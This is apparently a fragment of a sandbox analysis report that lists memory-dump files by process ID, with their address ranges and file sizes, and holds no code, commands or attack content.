-
memory/1844-180-0x0000000000000000-mapping.dmp
-
memory/1852-125-0x0000000000370000-0x0000000000371000-memory.dmpFilesize
4KB
-
memory/1852-157-0x0000000000C70000-0x0000000000C79000-memory.dmpFilesize
36KB
-
memory/1852-119-0x0000000000000000-mapping.dmp
-
memory/1852-165-0x00000000011B0000-0x00000000011B2000-memory.dmpFilesize
8KB
-
memory/1884-129-0x0000000000000000-mapping.dmp
-
memory/1972-144-0x0000000000000000-mapping.dmp
-
memory/2004-193-0x0000000000000000-mapping.dmp
-
memory/2184-182-0x0000000000000000-mapping.dmp
-
memory/2184-189-0x0000000000CB0000-0x0000000000CB1000-memory.dmpFilesize
4KB
-
memory/2184-197-0x000000001C7C0000-0x000000001C7C2000-memory.dmpFilesize
8KB
-
memory/2276-167-0x0000000000000000-mapping.dmp
-
memory/2276-195-0x000000001C530000-0x000000001C532000-memory.dmpFilesize
8KB
-
memory/2316-166-0x0000000000000000-mapping.dmp
-
memory/2316-194-0x00000000016A0000-0x00000000016A2000-memory.dmpFilesize
8KB
-
memory/2544-160-0x0000000000000000-mapping.dmp
-
memory/2692-139-0x0000000000000000-mapping.dmp
-
memory/2704-183-0x0000000000000000-mapping.dmp
-
memory/2704-188-0x0000000000560000-0x0000000000561000-memory.dmpFilesize
4KB
-
memory/2704-196-0x0000000000EB0000-0x0000000000EB2000-memory.dmpFilesize
8KB
-
memory/2712-204-0x0000000000560000-0x0000000000580000-memory.dmpFilesize
128KB
-
memory/2712-198-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2712-199-0x00000001402EB66C-mapping.dmp
-
memory/2712-200-0x0000000000510000-0x0000000000530000-memory.dmpFilesize
128KB
-
memory/2712-201-0x0000000140000000-0x0000000140758000-memory.dmpFilesize
7.3MB
-
memory/2832-140-0x0000000000000000-mapping.dmp
-
memory/2876-132-0x0000000000000000-mapping.dmp
-
memory/3028-181-0x0000000000000000-mapping.dmp
-
memory/3172-145-0x0000000000000000-mapping.dmp
-
memory/3172-150-0x000000001B1F0000-0x000000001B1F2000-memory.dmpFilesize
8KB
-
memory/3172-151-0x0000000000A80000-0x0000000000A85000-memory.dmpFilesize
20KB
-
memory/3172-152-0x0000000000B30000-0x0000000000B32000-memory.dmpFilesize
8KB
-
memory/3172-153-0x0000000000AC0000-0x0000000000AC2000-memory.dmpFilesize
8KB
-
memory/3172-154-0x000000001C2D0000-0x000000001C2D1000-memory.dmpFilesize
4KB
-
memory/3172-155-0x000000001D880000-0x000000001D881000-memory.dmpFilesize
4KB
-
memory/3372-161-0x0000000000000000-mapping.dmp
-
memory/3520-192-0x0000000000000000-mapping.dmp
-
memory/3520-142-0x0000000000000000-mapping.dmp